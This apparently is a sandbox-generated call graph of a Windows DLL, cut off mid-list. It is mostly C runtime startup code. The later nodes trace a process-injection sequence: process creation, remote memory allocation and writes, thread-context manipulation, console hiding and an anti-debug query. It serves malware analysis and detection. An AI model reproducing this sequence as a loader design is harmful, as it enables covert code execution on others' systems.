10858->10872 10862 6cdd15e7 dllmain_crt_dispatch 10859->10862 10859->10872 10860 6cdd152f __RTC_Initialize __DllMainCRTStartup@12 11325 6cdd1b9c 10860->11325 11334 6cdd0660 10861->11334 10862->10861 10862->10872 10868 6cdd1639 10869 6cdd1642 dllmain_crt_dispatch 10868->10869 10868->10872 10870 6cdd1655 dllmain_raw 10869->10870 10869->10872 10870->10872 10871 6cdd0660 __DllMainCRTStartup@12 5 API calls 10873 6cdd1620 10871->10873 10872->10821 10874 6cdd14e8 __DllMainCRTStartup@12 79 API calls 10873->10874 10875 6cdd162e dllmain_raw 10874->10875 10875->10868 10877 6cdd1a34 10876->10877 10899 6cdd1d98 IsProcessorFeaturePresent 10877->10899 10881 6cdd1a45 10882 6cdd1a49 10881->10882 10909 6cdd3c04 10881->10909 10882->10825 10885 6cdd1a60 10885->10825 10983 6cdd1a64 10887->10983 10889 6cdd1994 10889->10831 10890->10833 10892 6cdd1967 ___scrt_release_startup_lock 10891->10892 10893 6cdd1d98 IsProcessorFeaturePresent 10892->10893 10894 6cdd1970 10892->10894 10893->10894 10894->10834 10896 6cdd1be0 __DllMainCRTStartup@12 10895->10896 10897 6cdd1c8b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10896->10897 10898 6cdd1cd6 __DllMainCRTStartup@12 10897->10898 10898->10830 10900 6cdd1a40 10899->10900 10901 6cdd2851 10900->10901 10918 6cdd2c87 10901->10918 10905 6cdd286d 10905->10881 10906 6cdd2862 10906->10905 10932 6cdd2cc3 10906->10932 10908 6cdd285a 10908->10881 10974 6cdd634f 10909->10974 10912 6cdd2886 10913 6cdd288f 10912->10913 10914 6cdd2899 10912->10914 10915 6cdd2c6c ___vcrt_uninitialize_ptd 6 API calls 10913->10915 10914->10882 10916 6cdd2894 10915->10916 10917 6cdd2cc3 ___vcrt_uninitialize_locks DeleteCriticalSection 10916->10917 10917->10914 10919 6cdd2c90 10918->10919 10921 6cdd2cb9 10919->10921 10923 6cdd2856 10919->10923 10936 6cdd2ef5 10919->10936 10922 6cdd2cc3 ___vcrt_uninitialize_locks DeleteCriticalSection 10921->10922 10922->10923 10923->10908 10924 6cdd2c39 10923->10924 10955 6cdd2e06 10924->10955 10929 6cdd2c69 10929->10906 10931 6cdd2c4e 10931->10906 10933 6cdd2ced 10932->10933 10934 6cdd2cce 10932->10934 10933->10908 10935 6cdd2cd8 DeleteCriticalSection 10934->10935 10935->10933 10935->10935 10941 6cdd2dbd 10936->10941 10939 6cdd2f2d InitializeCriticalSectionAndSpinCount 10940 6cdd2f18 10939->10940 10940->10919 10942 6cdd2dd5 10941->10942 10943 6cdd2df8 10941->10943 10942->10943 10947 6cdd2d23 10942->10947 10943->10939 10943->10940 10946 6cdd2dea GetProcAddress 10946->10943 10952 6cdd2d2f ___vcrt_FlsGetValue 10947->10952 10948 6cdd2d45 LoadLibraryExW 10950 6cdd2daa 10948->10950 10951 6cdd2d63 GetLastError 10948->10951 10949 6cdd2da3 10949->10943 10949->10946 10950->10949 10953 6cdd2db2 FreeLibrary 10950->10953 10951->10952 10952->10948 10952->10949 10954 6cdd2d85 LoadLibraryExW 10952->10954 10953->10949 10954->10950 10954->10952 10956 6cdd2dbd ___vcrt_FlsGetValue 5 API calls 10955->10956 10957 6cdd2e20 10956->10957 10958 6cdd2e39 TlsAlloc 10957->10958 10959 6cdd2c43 10957->10959 10959->10931 10960 6cdd2eb7 10959->10960 10961 6cdd2dbd ___vcrt_FlsGetValue 5 API calls 10960->10961 10962 6cdd2ed1 10961->10962 10963 6cdd2eec TlsSetValue 10962->10963 10964 6cdd2c5c 10962->10964 10963->10964 10964->10929 10965 6cdd2c6c 10964->10965 10966 6cdd2c7c 10965->10966 10967 6cdd2c76 10965->10967 10966->10931 10969 6cdd2e41 10967->10969 10970 6cdd2dbd ___vcrt_FlsGetValue 5 API calls 10969->10970 10971 6cdd2e5b 10970->10971 10972 6cdd2e73 TlsFree 10971->10972 10973 6cdd2e67 10971->10973 10972->10973 10973->10966 10975 6cdd635f 10974->10975 10976 6cdd1a52 10974->10976 10975->10976 10978 6cdd620f 10975->10978 10976->10885 10976->10912 10980 6cdd6216 10978->10980 10979 6cdd6259 GetStdHandle 10979->10980 10980->10979 10981 6cdd62bf 10980->10981 10982 6cdd626c GetFileType 10980->10982 10981->10975 10982->10980 10984 6cdd1a74 10983->10984 10985 6cdd1a70 10983->10985 10986 6cdd1bca __DllMainCRTStartup@12 4 API calls 10984->10986 10988 6cdd1a81 ___scrt_release_startup_lock 10984->10988 10985->10889 10987 6cdd1aea 10986->10987 10988->10889 10995 6cdd420b 10989->10995 10992 6cdd287b 11273 6cdd2b63 10992->11273 10996 6cdd4215 10995->10996 10997 6cdd19bf 10995->10997 11003 6cdd5f81 10996->11003 10997->10992 11019 6cdd5e21 11003->11019 11005 6cdd5f9d 11006 6cdd5fb8 TlsGetValue 11005->11006 11007 6cdd421c 11005->11007 11007->10997 11008 6cdd5fc2 11007->11008 11009 6cdd5e21 _free 5 API calls 11008->11009 11010 6cdd5fde 11009->11010 11011 6cdd5ffc TlsSetValue 11010->11011 11012 6cdd422f 11010->11012 11013 6cdd40d2 11012->11013 11014 6cdd40dd 11013->11014 11015 6cdd40ed 11013->11015 11032 6cdd40f3 11014->11032 11015->10997 11020 6cdd5e4f 11019->11020 11024 6cdd5e4b _free 11019->11024 11020->11024 11025 6cdd5d5a 11020->11025 11023 6cdd5e69 GetProcAddress 11023->11024 11024->11005 11030 6cdd5d6b ___vcrt_FlsGetValue 11025->11030 11026 6cdd5e16 11026->11023 11026->11024 11027 6cdd5d89 LoadLibraryExW 11028 6cdd5da4 GetLastError 11027->11028 11027->11030 11028->11030 11029 6cdd5dff FreeLibrary 11029->11030 11030->11026 11030->11027 11030->11029 11031 6cdd5dd7 LoadLibraryExW 11030->11031 11031->11030 11033 6cdd4108 11032->11033 11034 6cdd410e 11032->11034 11035 6cdd4833 _free 14 API calls 11033->11035 11036 6cdd4833 _free 14 API calls 11034->11036 11035->11034 11037 6cdd411a 11036->11037 11038 6cdd4833 _free 14 API calls 11037->11038 11039 6cdd4125 11038->11039 11040 6cdd4833 _free 14 API calls 11039->11040 11041 6cdd4130 11040->11041 11042 6cdd4833 _free 14 API calls 11041->11042 11043 6cdd413b 11042->11043 11044 6cdd4833 _free 14 API calls 11043->11044 11045 6cdd4146 11044->11045 11046 6cdd4833 _free 14 API calls 11045->11046 11047 6cdd4151 11046->11047 11048 6cdd4833 _free 14 API calls 11047->11048 11049 6cdd415c 11048->11049 11050 6cdd4833 _free 14 API calls 11049->11050 11051 6cdd4167 11050->11051 11052 6cdd4833 _free 14 API calls 11051->11052 11053 6cdd4175 11052->11053 11064 6cdd3f1f 11053->11064 11058 6cdd4833 11059 6cdd483e HeapFree 11058->11059 11060 6cdd4867 _free 11058->11060 11059->11060 11061 6cdd4853 11059->11061 11060->11015 11204 6cdd47c3 11061->11204 11065 6cdd3f2b ___scrt_is_nonwritable_in_current_image 11064->11065 11080 6cdd44ca EnterCriticalSection 11065->11080 11067 6cdd3f35 11070 6cdd4833 _free 14 API calls 11067->11070 11071 6cdd3f5f 11067->11071 11070->11071 11081 6cdd3f7e 11071->11081 11072 6cdd3f8a 11073 6cdd3f96 ___scrt_is_nonwritable_in_current_image 11072->11073 11085 6cdd44ca EnterCriticalSection 11073->11085 11075 6cdd3fa0 11086 6cdd41c0 11075->11086 11077 6cdd3fb3 11090 6cdd3fd3 11077->11090 11080->11067 11084 6cdd4512 LeaveCriticalSection 11081->11084 11083 6cdd3f6c 11083->11072 11084->11083 11085->11075 11087 6cdd41f6 _free 11086->11087 11088 6cdd41cf _free 11086->11088 11087->11077 11088->11087 11093 6cdd6f1a 11088->11093 11203 6cdd4512 LeaveCriticalSection 11090->11203 11092 6cdd3fc1 11092->11058 11094 6cdd6f30 11093->11094 11095 6cdd6f9a 11093->11095 11094->11095 11098 6cdd6f63 11094->11098 11102 6cdd4833 _free 14 API calls 11094->11102 11097 6cdd4833 _free 14 API calls 11095->11097 11120 6cdd6fe8 11095->11120 11099 6cdd6fbc 11097->11099 11100 6cdd6f85 11098->11100 11108 6cdd4833 _free 14 API calls 11098->11108 11101 6cdd4833 _free 14 API calls 11099->11101 11104 6cdd4833 _free 14 API calls 11100->11104 11103 6cdd6fcf 11101->11103 11107 6cdd6f58 11102->11107 11109 6cdd4833 _free 14 API calls 11103->11109 11105 6cdd6f8f 11104->11105 11110 6cdd4833 _free 14 API calls 11105->11110 11106 6cdd7056 11111 6cdd4833 _free 14 API calls 11106->11111 11121 6cdd8e47 11107->11121 11113 6cdd6f7a 11108->11113 11114 6cdd6fdd 11109->11114 11110->11095 11116 6cdd705c 11111->11116 11149 6cdd8f45 11113->11149 11118 6cdd4833 _free 14 API calls 11114->11118 11115 6cdd6ff6 11115->11106 11119 6cdd4833 14 API calls _free 11115->11119 11116->11087 11118->11120 11119->11115 11161 6cdd708b 11120->11161 11122 6cdd8e58 11121->11122 11148 6cdd8f41 11121->11148 11123 6cdd8e69 11122->11123 11124 6cdd4833 _free 14 API calls 11122->11124 11125 6cdd8e7b 11123->11125 11126 6cdd4833 _free 14 API calls 11123->11126 11124->11123 11127 6cdd4833 _free 14 API calls 11125->11127 11128 6cdd8e8d 11125->11128 11126->11125 11127->11128 11129 6cdd8e9f 11128->11129 11131 6cdd4833 _free 14 API calls 11128->11131 11130 6cdd8eb1 11129->11130 11132 6cdd4833 _free 14 API calls 11129->11132 11133 6cdd8ec3 11130->11133 11134 6cdd4833 _free 14 API calls 11130->11134 11131->11129 11132->11130 11135 6cdd8ed5 11133->11135 11136 6cdd4833 _free 14 API calls 11133->11136 11134->11133 11137 6cdd8ee7 11135->11137 11139 6cdd4833 _free 14 API calls 11135->11139 11136->11135 11138 6cdd8ef9 11137->11138 11140 6cdd4833 _free 14 API calls 11137->11140 11141 6cdd8f0b 11138->11141 11142 6cdd4833 _free 14 API calls 11138->11142 11139->11137 11140->11138 11143 6cdd8f1d 11141->11143 11144 6cdd4833 _free 14 API calls 11141->11144 11142->11141 11145 6cdd8f2f 11143->11145 11146 6cdd4833 _free 14 API calls 11143->11146 11144->11143 11147 6cdd4833 _free 14 API calls 11145->11147 11145->11148 11146->11145 11147->11148 11148->11098 11150 6cdd8faa 11149->11150 11151 6cdd8f52 11149->11151 11150->11100 11152 6cdd8f62 11151->11152 11153 6cdd4833 _free 14 API calls 11151->11153 11154 6cdd8f74 11152->11154 11156 6cdd4833 _free 14 API calls 11152->11156 11153->11152 11155 6cdd8f86 11154->11155 11157 6cdd4833 _free 14 API calls 11154->11157 11158 6cdd8f98 11155->11158 11159 6cdd4833 _free 14 API calls 11155->11159 11156->11154 11157->11155 11158->11150 11160 6cdd4833 _free 14 API calls 11158->11160 11159->11158 11160->11150 11162 6cdd70b7 11161->11162 11163 6cdd7098 11161->11163 11162->11115 11163->11162 11167 6cdd8fe6 11163->11167 11166 6cdd4833 _free 14 API calls 11166->11162 11168 6cdd70b1 11167->11168 11169 6cdd8ff7 11167->11169 11168->11166 11170 6cdd8fae _free 14 API calls 11169->11170 11171 6cdd8fff 11170->11171 11172 6cdd8fae _free 14 API calls 11171->11172 11173 6cdd900a 11172->11173 11174 6cdd8fae _free 14 API calls 11173->11174 11175 6cdd9015 11174->11175 11176 6cdd8fae _free 14 API calls 11175->11176 11177 6cdd9020 11176->11177 11178 6cdd8fae _free 14 API calls 11177->11178 11179 6cdd902e 11178->11179 11180 6cdd4833 _free 14 API calls 11179->11180 11181 6cdd9039 11180->11181 11182 6cdd4833 _free 14 API calls 11181->11182 11183 6cdd9044 11182->11183 11184 6cdd4833 _free 14 API calls 11183->11184 11185 6cdd904f 11184->11185 11186 6cdd8fae _free 14 API calls 11185->11186 11187 6cdd905d 11186->11187 11188 6cdd8fae _free 14 API calls 11187->11188 11189 6cdd906b 11188->11189 11190 6cdd8fae _free 14 API calls 11189->11190 11191 6cdd907c 11190->11191 11192 6cdd8fae _free 14 API calls 11191->11192 11193 6cdd908a 11192->11193 11194 6cdd8fae _free 14 API calls 11193->11194 11195 6cdd9098 11194->11195 11196 6cdd4833 _free 14 API calls 11195->11196 11197 6cdd90a3 11196->11197 11198 6cdd4833 _free 14 API calls 11197->11198 11199 6cdd90ae 11198->11199 11200 6cdd4833 _free 14 API calls 11199->11200 11201 6cdd90b9 11200->11201 11202 6cdd4833 _free 14 API calls 11201->11202 11202->11168 11203->11092 11207 6cdd438e GetLastError 11204->11207 11206 6cdd47c8 GetLastError 11206->11060 11208 6cdd43a5 11207->11208 11209 6cdd43ab 11207->11209 11210 6cdd5f81 _free 6 API calls 11208->11210 11211 6cdd5fc2 _free 6 API calls 11209->11211 11229 6cdd43b1 SetLastError 11209->11229 11210->11209 11212 6cdd43c9 11211->11212 11212->11229 11230 6cdd47d6 11212->11230 11216 6cdd43f8 11218 6cdd5fc2 _free 6 API calls 11216->11218 11217 6cdd43e1 11219 6cdd5fc2 _free 6 API calls 11217->11219 11220 6cdd4404 11218->11220 11221 6cdd43ef 11219->11221 11222 6cdd4419 11220->11222 11223 6cdd4408 11220->11223 11224 6cdd4833 _free 12 API calls 11221->11224 11237 6cdd4039 11222->11237 11225 6cdd5fc2 _free 6 API calls 11223->11225 11224->11229 11225->11221 11228 6cdd4833 _free 12 API calls 11228->11229 11229->11206 11235 6cdd47e3 _free 11230->11235 11231 6cdd4823 11234 6cdd47c3 _free 13 API calls 11231->11234 11232 6cdd480e RtlAllocateHeap 11233 6cdd43d9 11232->11233 11232->11235 11233->11216 11233->11217 11234->11233 11235->11231 11235->11232 11242 6cdd63f7 11235->11242 11251 6cdd3ecd 11237->11251 11245 6cdd6424 11242->11245 11246 6cdd6430 ___scrt_is_nonwritable_in_current_image 11245->11246 11247 6cdd44ca _free EnterCriticalSection 11246->11247 11248 6cdd643b 11247->11248 11249 6cdd6477 _free LeaveCriticalSection 11248->11249 11250 6cdd6402 11249->11250 11250->11235 11252 6cdd3ed9 ___scrt_is_nonwritable_in_current_image 11251->11252 11265 6cdd44ca EnterCriticalSection 11252->11265 11254 6cdd3ee3 11266 6cdd3f13 11254->11266 11257 6cdd3fdf 11258 6cdd3feb ___scrt_is_nonwritable_in_current_image 11257->11258 11269 6cdd44ca EnterCriticalSection 11258->11269 11260 6cdd3ff5 11261 6cdd41c0 _free 14 API calls 11260->11261 11262 6cdd400d 11261->11262 11270 6cdd402d 11262->11270 11265->11254 11267 6cdd4512 __fassign LeaveCriticalSection 11266->11267 11268 6cdd3f01 11267->11268 11268->11257 11269->11260 11271 6cdd4512 __fassign LeaveCriticalSection 11270->11271 11272 6cdd401b 11271->11272 11272->11228 11274 6cdd2b70 11273->11274 11280 6cdd19c4 11273->11280 11275 6cdd2b7e 11274->11275 11281 6cdd2e7c 11274->11281 11276 6cdd2eb7 ___vcrt_FlsSetValue 6 API calls 11275->11276 11278 6cdd2b8e 11276->11278 11286 6cdd2b47 11278->11286 11280->10821 11282 6cdd2dbd ___vcrt_FlsGetValue 5 API calls 11281->11282 11283 6cdd2e96 11282->11283 11284 6cdd2eae TlsGetValue 11283->11284 11285 6cdd2ea2 11283->11285 11284->11285 11285->11275 11287 6cdd2b5e 11286->11287 11288 6cdd2b51 11286->11288 11287->11280 11288->11287 11290 6cdd3ca7 11288->11290 11291 6cdd4833 _free 14 API calls 11290->11291 11292 6cdd3cbf 11291->11292 11292->11287 11299 6cdd2ba7 11293->11299 11295 6cdd19a0 11295->10848 11296 6cdd3c16 11295->11296 11297 6cdd438e _free 14 API calls 11296->11297 11298 6cdd19ac 11297->11298 11298->10845 11298->10847 11300 6cdd2bb0 11299->11300 11301 6cdd2bb3 GetLastError 11299->11301 11300->11295 11302 6cdd2e7c ___vcrt_FlsGetValue 6 API calls 11301->11302 11303 6cdd2bc8 11302->11303 11304 6cdd2be7 11303->11304 11305 6cdd2c2d SetLastError 11303->11305 11306 6cdd2eb7 ___vcrt_FlsSetValue 6 API calls 11303->11306 11304->11305 11305->11295 11307 6cdd2be1 11306->11307 11307->11304 11308 6cdd2c09 11307->11308 11309 6cdd2eb7 ___vcrt_FlsSetValue 6 API calls 11307->11309 11310 6cdd2eb7 ___vcrt_FlsSetValue 6 API calls 11308->11310 11311 6cdd2c1d 11308->11311 11309->11308 11310->11311 11312 6cdd3ca7 ___std_type_info_destroy_list 14 API calls 11311->11312 11312->11304 11314 6cdd1a00 ___scrt_release_startup_lock 11313->11314 11315 6cdd1a04 11314->11315 11319 6cdd1a10 __DllMainCRTStartup@12 11314->11319 11338 6cdd3a91 11315->11338 11318 6cdd1a1d 11318->10856 11319->11318 11341 6cdd32f4 11319->11341 11408 6cdd282e InterlockedFlushSList 11322->11408 11326 6cdd1ba8 11325->11326 11327 6cdd154e 11326->11327 11412 6cdd3c29 11326->11412 11331 6cdd158a 11327->11331 11329 6cdd1bb6 11330 6cdd2886 ___scrt_uninitialize_crt 7 API calls 11329->11330 11330->11327 11525 6cdd1a1e 11331->11525 11335 6cdd068b 11334->11335 11542 6cdd1380 11335->11542 11337 6cdd1232 11337->10868 11337->10871 11352 6cdd395c 11338->11352 11342 6cdd3313 11341->11342 11343 6cdd3302 11341->11343 11376 6cdd31ba 11342->11376 11369 6cdd339a GetModuleHandleW 11343->11369 11348 6cdd334d 11348->10856 11353 6cdd3968 ___scrt_is_nonwritable_in_current_image 11352->11353 11360 6cdd44ca EnterCriticalSection 11353->11360 11355 6cdd3976 11361 6cdd39b7 11355->11361 11360->11355 11362 6cdd39d6 11361->11362 11363 6cdd3983 11361->11363 11362->11363 11364 6cdd4833 _free 14 API calls 11362->11364 11365 6cdd39ab 11363->11365 11364->11363 11368 6cdd4512 LeaveCriticalSection 11365->11368 11367 6cdd1a0e 11367->10856 11368->11367 11370 6cdd3307 11369->11370 11370->11342 11371 6cdd33dd GetModuleHandleExW 11370->11371 11372 6cdd33fc GetProcAddress 11371->11372 11375 6cdd3411 11371->11375 11372->11375 11373 6cdd342e 11373->11342 11374 6cdd3425 FreeLibrary 11374->11373 11375->11373 11375->11374 11377 6cdd31c6 ___scrt_is_nonwritable_in_current_image 11376->11377 11392 6cdd44ca EnterCriticalSection 11377->11392 11379 6cdd31d0 11393 6cdd3207 11379->11393 11381 6cdd31dd 11397 6cdd31fb 11381->11397 11384 6cdd3358 11401 6cdd4529 GetPEB 11384->11401 11387 6cdd3387 11390 6cdd33dd __DllMainCRTStartup@12 3 API calls 11387->11390 11388 6cdd3367 GetPEB 11388->11387 11389 6cdd3377 GetCurrentProcess TerminateProcess 11388->11389 11389->11387 11391 6cdd338f ExitProcess 11390->11391 11392->11379 11394 6cdd3213 ___scrt_is_nonwritable_in_current_image 11393->11394 11395 6cdd3a91 __DllMainCRTStartup@12 14 API calls 11394->11395 11396 6cdd3274 __DllMainCRTStartup@12 11394->11396 11395->11396 11396->11381 11400 6cdd4512 LeaveCriticalSection 11397->11400 11399 6cdd31e9 11399->11348 11399->11384 11400->11399 11402 6cdd4543 11401->11402 11404 6cdd3362 11401->11404 11405 6cdd5ea4 11402->11405 11404->11387 11404->11388 11406 6cdd5e21 _free 5 API calls 11405->11406 11407 6cdd5ec0 11406->11407 11407->11404 11409 6cdd18c1 11408->11409 11410 6cdd283e 11408->11410 11409->10860 11410->11409 11411 6cdd3ca7 ___std_type_info_destroy_list 14 API calls 11410->11411 11411->11410 11413 6cdd3c34 11412->11413 11414 6cdd3c46 ___scrt_uninitialize_crt 11412->11414 11415 6cdd3c42 11413->11415 11417 6cdd6a69 11413->11417 11414->11329 11415->11329 11420 6cdd6917 11417->11420 11423 6cdd686b 11420->11423 11424 6cdd6877 ___scrt_is_nonwritable_in_current_image 11423->11424 11431 6cdd44ca EnterCriticalSection 11424->11431 11426 6cdd68ed 11440 6cdd690b 11426->11440 11429 6cdd6881 ___scrt_uninitialize_crt 11429->11426 11432 6cdd67df 11429->11432 11431->11429 11433 6cdd67eb ___scrt_is_nonwritable_in_current_image 11432->11433 11443 6cdd6b86 EnterCriticalSection 11433->11443 11435 6cdd67f5 ___scrt_uninitialize_crt 11436 6cdd682e 11435->11436 11444 6cdd6a21 11435->11444 11454 6cdd685f 11436->11454 11524 6cdd4512 LeaveCriticalSection 11440->11524 11442 6cdd68f9 11442->11415 11443->11435 11445 6cdd6a2e 11444->11445 11446 6cdd6a37 11444->11446 11447 6cdd6917 ___scrt_uninitialize_crt 66 API calls 11445->11447 11457 6cdd69bc 11446->11457 11449 6cdd6a34 11447->11449 11449->11436 11452 6cdd6a53 11470 6cdd8082 11452->11470 11523 6cdd6b9a LeaveCriticalSection 11454->11523 11456 6cdd684d 11456->11429 11458 6cdd69d4 11457->11458 11462 6cdd69f9 11457->11462 11459 6cdd6db2 ___scrt_uninitialize_crt 25 API calls 11458->11459 11458->11462 11460 6cdd69f2 11459->11460 11481 6cdd887a 11460->11481 11462->11449 11463 6cdd6db2 11462->11463 11464 6cdd6dbe 11463->11464 11465 6cdd6dd3 11463->11465 11466 6cdd47c3 _free 14 API calls 11464->11466 11465->11452 11467 6cdd6dc3 11466->11467 11506 6cdd4706 11467->11506 11471 6cdd80a0 11470->11471 11472 6cdd8093 11470->11472 11474 6cdd80e9 11471->11474 11476 6cdd80c7 11471->11476 11473 6cdd47c3 _free 14 API calls 11472->11473 11480 6cdd8098 11473->11480 11475 6cdd47c3 _free 14 API calls 11474->11475 11477 6cdd80ee 11475->11477 11509 6cdd7fe0 11476->11509 11479 6cdd4706 __fassign 25 API calls 11477->11479 11479->11480 11480->11449 11482 6cdd8886 ___scrt_is_nonwritable_in_current_image 11481->11482 11483 6cdd888e 11482->11483 11484 6cdd88a6 11482->11484 11486 6cdd47b0 __dosmaperr 14 API calls 11483->11486 11485 6cdd8941 11484->11485 11489 6cdd88d8 11484->11489 11487 6cdd47b0 __dosmaperr 14 API calls 11485->11487 11488 6cdd8893 11486->11488 11490 6cdd8946 11487->11490 11491 6cdd47c3 _free 14 API calls 11488->11491 11492 6cdd7e9f ___scrt_uninitialize_crt EnterCriticalSection 11489->11492 11493 6cdd47c3 _free 14 API calls 11490->11493 11505 6cdd889b 11491->11505 11494 6cdd88de 11492->11494 11495 6cdd894e 11493->11495 11496 6cdd890f 11494->11496 11497 6cdd88fa 11494->11497 11498 6cdd4706 __fassign 25 API calls 11495->11498 11500 6cdd896c ___scrt_uninitialize_crt 60 API calls 11496->11500 11499 6cdd47c3 _free 14 API calls 11497->11499 11498->11505 11501 6cdd88ff 11499->11501 11502 6cdd890a 11500->11502 11503 6cdd47b0 __dosmaperr 14 API calls 11501->11503 11504 6cdd8939 ___scrt_uninitialize_crt LeaveCriticalSection 11502->11504 11503->11502 11504->11505 11505->11462 11507 6cdd46a2 __fassign 25 API calls 11506->11507 11508 6cdd4712 11507->11508 11508->11452 11510 6cdd7fec ___scrt_is_nonwritable_in_current_image 11509->11510 11511 6cdd7e9f ___scrt_uninitialize_crt EnterCriticalSection 11510->11511 11512 6cdd7ffb 11511->11512 11513 6cdd8042 11512->11513 11514 6cdd7f76 ___scrt_uninitialize_crt 25 API calls 11512->11514 11515 6cdd47c3 _free 14 API calls 11513->11515 11516 6cdd8027 FlushFileBuffers 11514->11516 11517 6cdd8047 11515->11517 11516->11517 11518 6cdd8033 11516->11518 11520 6cdd8076 ___scrt_uninitialize_crt LeaveCriticalSection 11517->11520 11519 6cdd47b0 __dosmaperr 14 API calls 11518->11519 11521 6cdd8038 GetLastError 11519->11521 11522 6cdd805f 11520->11522 11521->11513 11522->11480 11523->11456 11524->11442 11530 6cdd3c59 11525->11530 11528 6cdd2c6c ___vcrt_uninitialize_ptd 6 API calls 11529 6cdd158f 11528->11529 11529->10851 11533 6cdd446f 11530->11533 11534 6cdd4479 11533->11534 11535 6cdd1a25 11533->11535 11537 6cdd5f42 11534->11537 11535->11528 11538 6cdd5e21 _free 5 API calls 11537->11538 11539 6cdd5f5e 11538->11539 11540 6cdd5f79 TlsFree 11539->11540 11541 6cdd5f67 11539->11541 11541->11535 11543 6cdd1389 IsProcessorFeaturePresent 11542->11543 11544 6cdd1388 11542->11544 11546 6cdd172e 11543->11546 11544->11337 11549 6cdd16f1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11546->11549 11548 6cdd1811 11548->11337 11549->11548 11550 6cdd16ce 11551 6cdd16dc 11550->11551 11552 6cdd16d7 11550->11552 11556 6cdd1598 11551->11556 11571 6cdd1860 11552->11571 11559 6cdd15a4 ___scrt_is_nonwritable_in_current_image 11556->11559 11557 6cdd15b3 11558 6cdd15cd dllmain_raw 11558->11557 11561 6cdd15e7 dllmain_crt_dispatch 11558->11561 11559->11557 11559->11558 11560 6cdd15c8 11559->11560 11562 6cdd0660 __DllMainCRTStartup@12 5 API calls 11560->11562 11561->11557 11561->11560 11563 6cdd1608 11562->11563 11564 6cdd1639 11563->11564 11567 6cdd0660 __DllMainCRTStartup@12 5 API calls 11563->11567 11564->11557 11565 6cdd1642 dllmain_crt_dispatch 11564->11565 11565->11557 11566 6cdd1655 dllmain_raw 11565->11566 11566->11557 11568 6cdd1620 11567->11568 11569 6cdd14e8 __DllMainCRTStartup@12 84 API calls 11568->11569 11570 6cdd162e dllmain_raw 11569->11570 11570->11564 11572 6cdd1876 11571->11572 11574 6cdd187f 11572->11574 11575 6cdd1813 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 11572->11575 11574->11551 11575->11574 11576 6cdc86f0 11579 6cdc874f __DllMainCRTStartup@12 11576->11579 11577 6cdcfe11 CloseHandle 11577->11579 11578 6cdcc71f NtWriteVirtualMemory 11578->11579 11579->11577 11579->11578 11581 6cdcf783 NtWriteVirtualMemory 11579->11581 11582 6cdcff73 NtAllocateVirtualMemory 11579->11582 11583 6cdcac31 VirtualAlloc 11579->11583 11584 6cdce7d6 NtCreateThreadEx 11579->11584 11585 6cdcb9e3 NtWriteVirtualMemory 11579->11585 11586 6cdcbe2a NtWriteVirtualMemory 11579->11586 11587 6cdd056e NtGetContextThread 11579->11587 11588 6cdcfb3c NtWriteVirtualMemory 11579->11588 11589 6cdd03b9 NtCreateThreadEx 11579->11589 11590 6cdd04f7 CloseHandle 11579->11590 11591 6cdcfa4d NtReadVirtualMemory 11579->11591 11592 6cdca7aa GetConsoleWindow ShowWindow 11579->11592 11594 6cdc1400 29 API calls 11579->11594 11596 6cdcb3c5 CreateProcessW 11579->11596 11597 6cdcee05 CloseHandle 11579->11597 11598 6cdcdefa NtWriteVirtualMemory 11579->11598 11599 6cdcb609 NtGetContextThread 11579->11599 11600 6cdcd8d4 NtWriteVirtualMemory 11579->11600 11601 6cdd05c5 NtWriteVirtualMemory 11579->11601 11602 6cdcf6fe NtGetContextThread 11579->11602 11603 6cdd012c NtWriteVirtualMemory 11579->11603 11605 6cdd004a NtWriteVirtualMemory 11579->11605 11606 6cdcd7aa NtReadVirtualMemory 11579->11606 11607 6cdcb976 NtAllocateVirtualMemory 11579->11607 11608 6cdcec6c NtSetContextThread NtResumeThread 11579->11608 11609 6cdcb798 NtAllocateVirtualMemory 11579->11609 11610 6cdcf030 CloseHandle 11579->11610 11611 6cdcf54e 11579->11611 11614 6cdcfde7 CloseHandle 11579->11614 11642 6cdc6bd0 11579->11642 11653 6cdc1000 11579->11653 11581->11579 11582->11579 11583->11579 11584->11579 11585->11579 11586->11579 11587->11579 11588->11579 11589->11579 11590->11579 11591->11579 11615 6cdc1400 11592->11615 11594->11579 11596->11579 11597->11579 11598->11579 11599->11579 11600->11579 11601->11579 11602->11579 11604 6cdd01e0 11603->11604 11604->11579 11605->11579 11606->11579 11607->11579 11608->11579 11609->11579 11610->11579 11612 6cdd1380 _ValidateLocalCookies 5 API calls 11611->11612 11613 6cdcf558 11612->11613 11614->11579 11628 6cdc1428 ___scrt_uninitialize_crt 11615->11628 11616 6cdc25e7 GetModuleFileNameA CreateFileA 11616->11628 11617 6cdc3ed6 CloseHandle CloseHandle 11617->11628 11618 6cdc460f CreateFileMappingA 11618->11628 11619 6cdc33bf MapViewOfFile 11619->11628 11620 6cdc2dcf CreateFileMappingA 11620->11628 11621 6cdc22aa GetCurrentProcess 11657 6cdd1fb0 11621->11657 11624 6cdc4212 CreateFileMappingA 11624->11628 11625 6cdc4058 GetCurrentProcess 11626 6cdd1fb0 __DllMainCRTStartup@12 11625->11626 11627 6cdc4087 GetModuleHandleA 11626->11627 11627->11628 11628->11616 11628->11617 11628->11618 11628->11619 11628->11620 11628->11621 11628->11624 11628->11625 11629 6cdc3c38 VirtualProtect 11628->11629 11630 6cdc477a CloseHandle CloseHandle 11628->11630 11631 6cdc4693 MapViewOfFile 11628->11631 11632 6cdc328a CloseHandle 11628->11632 11633 6cdc4675 CloseHandle 11628->11633 11634 6cdc4047 11628->11634 11637 6cdc3b7c VirtualProtect 11628->11637 11638 6cdc3f7d CloseHandle 11628->11638 11639 6cdc40ab GetModuleFileNameA CreateFileA 11628->11639 11640 6cdc2539 K32GetModuleInformation 11628->11640 11641 6cdc4335 MapViewOfFile 11628->11641 11629->11628 11630->11628 11631->11628 11632->11628 11633->11628 11635 6cdd1380 _ValidateLocalCookies 5 API calls 11634->11635 11636 6cdc4051 11635->11636 11636->11579 11637->11628 11638->11628 11639->11628 11640->11628 11641->11628 11643 6cdc6c29 11642->11643 11644 6cdc754b NtQueryInformationProcess 11643->11644 11645 6cdc80f5 GetModuleHandleW 11643->11645 11647 6cdc80da 11643->11647 11650 6cdc732e GetModuleHandleW 11643->11650 11644->11643 11646 6cdc4810 5 API calls 11645->11646 11652 6cdc7373 __DllMainCRTStartup@12 11646->11652 11648 6cdd1380 _ValidateLocalCookies 5 API calls 11647->11648 11649 6cdc80ea 11648->11649 11649->11579 11659 